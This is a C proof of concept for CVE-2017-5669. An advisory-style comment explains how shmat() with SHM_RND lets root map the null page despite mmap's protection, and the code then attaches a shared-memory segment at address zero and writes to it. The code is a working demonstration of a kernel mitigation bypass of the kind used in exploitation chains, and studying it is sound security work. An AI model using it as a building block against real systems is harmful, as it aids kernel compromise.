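/*
 * CVE-2017-5669: shmat() allows the mmap() null-page protection to be bypassed
 *
 * --[ 1. Overview
 *
 * The null-page protection enforced by shmat() is not consistent with the one
 * enforced by mmap(), and allows a privileged user to map the null page.
 *
 * When a privileged user asks mmap() for an address below 64k (without
 * MAP_FIXED), the request is treated as if addr were NULL and the kernel
 * returns a different address of its own choosing.  shmat() instead hands the
 * root user exactly the address asked for: with SHM_RND an attach address of 1
 * is rounded down to 0, so the segment lands on the null page and the
 * protection that mmap() affords is bypassed.
 *
 * The proof of concept below first shows the mmap() behaviour, then attaches a
 * System V shared-memory segment at the same address through shmat().
 *
 * --[ 2. Proof of Concept
 *
 * Build:  cc -o shmat_null shmat_null.c
 * Run:    ./shmat_null          (as root; an unprivileged run is expected to
 *                                fail at the shmat() step and report the errno)
 *
 * Notes on the PoC as a program: every syscall result is checked before the
 * returned pointer is dereferenced (writing through MAP_FAILED or (void *)-1
 * would only crash the PoC and hide the real outcome), the segment is marked
 * for removal so it does not outlive the process, and it is created 0600
 * rather than 0777 so no world-accessible segment is left around while the
 * PoC runs.
 */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ipc.h>
#include <sys/mman.h>
#include <sys/shm.h>
#include <sys/types.h>

/* Requested address: 1, i.e. inside the null page.  With SHM_RND shmat()
 * rounds it down to the SHMLBA boundary, which is 0. */
#define LOCATION ((void *)1)

/* Size of the region used by both halves of the PoC. */
enum { REGION_LEN = 4096 };

/*
 * Entry point.  Returns EXIT_SUCCESS when both steps completed (whether or
 * not the kernel honoured the requested address is visible in the printed
 * addresses), EXIT_FAILURE when shmget()/shmat() fail.  argv[0] is only used
 * as the ftok() path for the shared-memory key.
 */
int main(int argc, char *argv[])
{
    void *ptr;
    int hndl;
    key_t key;
    const char *key_path;

    printf("Attempting to mmap the null page\n");
    ptr = mmap(LOCATION, REGION_LEN, PROT_READ | PROT_WRITE,
               MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (ptr == MAP_FAILED) {
        /* Not fatal for the PoC: the interesting step is shmat() below. */
        printf("Mmap failed: %s\n", strerror(errno));
    } else {
        printf("Mmap: %p\n", ptr);
        ((char *)ptr)[0] = 'A';
        printf("Unmapping mmaped page\n");
        if (munmap(ptr, REGION_LEN) == -1)
            printf("Error unmapping page %s\n", strerror(errno));
    }

    /* argv[0] may be NULL when argc == 0; ftok() needs an existing path. */
    key_path = (argc > 0 && argv[0] != NULL) ? argv[0] : ".";
    key = ftok(key_path, 'f');
    if (key == (key_t)-1) {
        perror("Error deriving IPC key");
        return EXIT_FAILURE;
    }

    printf("Allocating system-v shared memory\n");
    /* 0600: only this user can attach the segment while the PoC runs. */
    hndl = shmget(key, REGION_LEN, IPC_CREAT | 0600);
    if (hndl == -1) {
        /* perror() appends its own newline. */
        perror("Error creating memory region");
        return EXIT_FAILURE;
    }
    /* Mark for removal now: the segment disappears once the last attach is
     * gone, so an early exit cannot leak it. */
    if (shmctl(hndl, IPC_RMID, NULL) == -1)
        printf("Error marking segment for removal %s\n", strerror(errno));

    printf("Attaching shared memory to null page\n");
    ptr = shmat(hndl, LOCATION, SHM_RND);
    if (ptr == (void *)-1) {
        /* On a fixed kernel this is the expected outcome (EINVAL);
         * unprivileged users get EPERM.  Never write through (void *)-1. */
        printf("Error attaching %s\n", strerror(errno));
        return EXIT_FAILURE;
    }
    printf("Mapped to %p\n", ptr);
    /* A NULL result here means the null page really is mapped and writable. */
    ((char *)ptr)[0] = 'A';

    printf("Unmapping page\n");
    if (shmdt(ptr) == -1)
        printf("Error detaching page %s\n", strerror(errno));

    return EXIT_SUCCESS;
}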